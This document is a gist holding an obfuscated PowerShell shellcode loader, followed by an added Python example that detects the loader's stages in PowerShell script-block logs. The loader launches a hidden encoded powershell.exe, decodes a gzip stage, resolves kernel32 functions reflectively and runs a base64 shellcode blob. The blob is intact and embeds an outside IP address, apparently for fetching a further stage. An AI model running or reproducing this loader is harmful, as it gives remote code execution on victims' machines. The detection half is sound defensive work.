@nl5887
Created March 7, 2019 19:21
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -e 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';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
function xGok {
Param ($bqkob, $hxuZ)
$goJQv = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $goJQv.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($goJQv.GetMethod('GetModuleHandle')).Invoke($null, @($bqkob)))), $hxuZ))
}
function ipx {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $qk,
[Parameter(Position = 1)] [Type] $xFQ = [Void]
)
$unvPB = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$unvPB.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $qk).SetImplementationFlags('Runtime, Managed')
$unvPB.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $xFQ, $qk).SetImplementationFlags('Runtime, Managed')
return $unvPB.CreateType()
}
[Byte[]]$iU = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2i7AQAA6GIBAAAvUVdESm5WRE5SUGZEOWNMMG1LVnVIUVoteDJUQWs4N2ZXNDFFVGdpOEFNWDVHazhpaTIzVGVrVTc3eGc3YTI5NHk4akYtSlY5YWVkaURGTWZoSkFQa1NfbE13c3RmZm05VVV1U0MtOEFIR2pXMDUtWnpJemVBZVR6ZWI5SjhjR29QSk1jM1RFV2swbnNiMHFxbzVybUs3VlVNZnhCbXdBRkdOdmFrdHY3OU1ZVXRORnViRUhVOXhTUHZ4czA0V295cVFLeTB5SDFBOHB5dm9icl8AUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6EsAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///84OS4xMDUuMTk0LjIwMgC74B0qCmimlb2d/9U8BnwKgPvgdQW7RxNyb2oAU//V")
$icyG = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll VirtualAlloc), (ipx @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iU.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($iU, 0, $icyG, $iU.length)
$cw = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll CreateThread), (ipx @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$icyG,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xGok kernel32.dll WaitForSingleObject), (ipx @([IntPtr], [Int32]))).Invoke($cw,0xffffffff) | Out-Null
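The gist above is a captured in-memory shellcode loader: a hidden, non-interactive child powershell.exe started with an encoded command, a base64-plus-gzip second stage, a reflective lookup of kernel32 exports through Microsoft.Win32.UnsafeNativeMethods, a delegate type built at runtime with DefineDynamicAssembly, and the VirtualAlloc, Marshal.Copy, CreateThread, WaitForSingleObject sequence that runs the decoded bytes. The following is an added detection example, not part of the gist, that scores PowerShell script-block text (for instance the text of Microsoft-Windows-PowerShell/Operational event 4104 records, assumed here as the log source) against those stages. The indicator names, regexes, threshold and sample blocks are all constructed for this example.

```python
"""Score PowerShell script-block text for the stages of the in-memory loader above."""
import re
from typing import Dict, Iterable, List, Tuple

# Constructed indicator set: one case-insensitive regex per loader stage. A block is
# flagged only when several independent stages are present, so a certificate script
# that merely decodes base64 does not fire on its own.
INDICATORS: Dict[str, str] = {
    # hidden, non-interactive, no-profile child powershell with an encoded command
    "hidden_encoded_launch": (
        r"-w(?:indowstyle)?\s+hidden"
        r"|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}"
        r"|(?<!\w)-noni\b|(?<!\w)-nop\b"
    ),
    # base64 blob fed through a gzip decompressor
    "base64_gzip_stage": r"GzipStream|CompressionMode\]::Decompress",
    # reflection into the private Win32 wrappers inside System.dll
    "reflective_export_lookup": r"UnsafeNativeMethods|GetProcAddress|GetModuleHandle",
    # delegate type emitted at runtime to call an unmanaged function pointer
    "dynamic_delegate": r"DefineDynamicAssembly|GetDelegateForFunctionPointer",
    # allocate executable memory, copy bytes in, start a thread, wait on it
    "alloc_copy_thread": r"VirtualAlloc|Marshal\]::Copy|CreateThread|WaitForSingleObject",
    # raw byte array decoded straight from base64
    "byte_array_from_base64": r"\[Byte\[\]\].{0,40}FromBase64String",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE | re.DOTALL) for name, pat in INDICATORS.items()}


def matched_indicators(script_text: str) -> List[str]:
    """Return the names of every indicator that matches, in INDICATORS order."""
    return [name for name, rx in COMPILED.items() if rx.search(script_text)]


def is_loader_like(script_text: str, threshold: int = 3) -> bool:
    """True when at least `threshold` distinct stages are present in one block."""
    return len(matched_indicators(script_text)) >= threshold


def scan_script_blocks(blocks: Iterable[Tuple[str, str]], threshold: int = 3) -> List[Tuple[str, List[str]]]:
    """blocks: (block_id, script_text) pairs, e.g. pulled from 4104 events.
    Returns the flagged blocks together with the stages that matched."""
    flagged: List[Tuple[str, List[str]]] = []
    for block_id, text in blocks:
        hits = matched_indicators(text)
        if len(hits) >= threshold:
            flagged.append((block_id, hits))
    return flagged


# Constructed sample script blocks (not the gist's own text). b1 mimics the injector
# stage with dummy bytes and placeholder variables; b2 mimics only the hidden encoded
# launch; b3 and b4 are benign administration one-liners.
SAMPLE_BLOCKS: List[Tuple[str, str]] = [
    ("b1",
     "$sc=[Byte[]][Convert]::FromBase64String('QUFBQUFBQUFBQUFBQUFBQQ==');"
     "$t=([AppDomain]::CurrentDomain.GetAssemblies()|?{$_.Location.Split('\\')[-1] -eq 'System.dll'})"
     ".GetType('Microsoft.Win32.UnsafeNativeMethods');"
     "$va=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptrVirtualAlloc,$sigVirtualAlloc);"
     "$mem=$va.Invoke([IntPtr]::Zero,$sc.Length,0x3000,0x40);"
     "[Runtime.InteropServices.Marshal]::Copy($sc,0,$mem,$sc.Length);"
     "$h=$ct.Invoke([IntPtr]::Zero,0,$mem,[IntPtr]::Zero,0,[IntPtr]::Zero);$wfso.Invoke($h,0xffffffff)"),
    ("b2",
     "$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName='powershell.exe';"
     "$s.Arguments='-noni -nop -w hidden -e QUFBQUFBQUFBQUFBQUFBQUFBQUFB';"
     "$s.WindowStyle='Hidden';[System.Diagnostics.Process]::Start($s)"),
    ("b3",
     "$der=[Byte[]][Convert]::FromBase64String($pem -replace '-----.*?-----','');"
     "Set-Content -Path C:\\certs\\app.cer -Value $der -Encoding Byte"),
    ("b4",
     "Get-ChildItem -Path C:\\logs -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object FullName, Length"),
]

if __name__ == "__main__":
    for block_id, hits in scan_script_blocks(SAMPLE_BLOCKS):
        print(f"{block_id}: {', '.join(hits)}")
```

Because the gist splits its work across a launcher and a separately decoded stage, the launch block alone scores only one stage at the default threshold; in practice the launcher hit is best correlated with the parent process or the subsequent 4104 records of the same session rather than scored in isolation, which is why the threshold is a parameter.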